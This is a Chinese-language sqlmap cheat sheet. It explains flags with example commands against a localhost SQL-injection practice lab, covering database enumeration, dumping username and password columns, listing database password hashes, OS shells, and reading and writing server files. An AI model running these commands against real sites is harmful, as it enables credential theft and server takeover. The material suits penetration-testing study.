1. -u:表示需要探测的目标站点url,例如:
sqlmap.py -u http://127.0.0.1/sql1/Less-1/?id=1
注:如果url后参数个数大于等于2个,则需要加上双引号
sqlmap.py -u "http://127.0.0.1/sql1/Less-1/?id=1&username=zhangsan"
2. -r:表示判断一个文本中的请求是否存在注入,一般在存在cookie注入时使用,路径可以是相对路径也可以是绝对路径
sqlmap.py -r desktop/1.txt
3.--dbs:表示查询当前用户下的所有数据库,缩写成-D xxx,表示查询xxx数据中继续查询其他数据
sqlmap.py -u http://127.0.0.1/sql1/Less-1/?id=1 --dbs
4.--tables:表示查询数据库中的表名,缩写成-T xxx,表示查询xxx表中的其他数据
sqlmap.py -u "http://127.0.0.1/sql1/Less-1/?id=1" -D sqli --tables
5.--column:表示获取表中的字段名,缩写成-C xxx,表示查询xxx列的其它数据
sqlmap.py -u "http://127.0.0.1/sql1/Less-1/?id=1" -D sqli -T user --column
6. --dump -D sqli -T user -C username ,password ,表示查询sqli数据库中的user表中的 username和password字段的数据
sqlmap.py -u "http://127.0.0.1/sql1/Less-1/?id=1" --dump -D sqli -T user -C username,password
7.--users:表示列出数据库的所有用户
sqlmap.py -u "http://127.0.0.1/sql1/Less-1/?id=1" --users
8.--passwords:表示列出数据库用户的密码
sqlmap.py -u "http://127.0.0.1/sql1/Less-1/?id=1" --passwords
9.--current-db:表示列出当前网站使用的数据库
sqlmap.py -u "http://127.0.0.1/sql1/Less-1/?id=1" --current-db
10.--current-user:表示列出当前网站数据库的用户名称
sqlmap.py -u "http://127.0.0.1/sql1/Less-1/?id=1" --current-user
11.--level :表示探测等级, 有1~5五个等级,5表示最高等级,payload最多,可自动破解cookie,XFF注入等漏洞,运行速度较慢
12. --is-dba:表示当前用户是否为管理权限
sqlmap.py -u "http://127.0.0.1/sql1/Less-1/?id=1" --is-dba
13.--roles:列出数据库管理员角色(只适用于Oracle数据库)
14.--referer:表示可以伪造http referer头,进行referer欺骗, 例如:--referer http://www.baidu.com,表示上个地址源来自百度
15.--sql-shell:表示可以运行自定义sql语句
16.--os-cmd, --os-shell:表示可以运行windows和linux操作系统命令
17.--file-read:表示从数据库服务器中读取文件
sqlmap.py -u "http://127.0.0.1/sqlmap/mssql/iis/get_str2.asp?name=file" \ --file-read "C:/example.exe" -v 1
18.--file-write “xxx” --file-dest "yyy" :表示将xxx写到服务器yyy目录下
slqmap.py -u "http://127.0.0.1/sqlmap/mssql/iis/get_int.aspx?id=1" --file-write \ "/software/a.exe" --file-dest "C:/windows/temp/a.exe" -v 1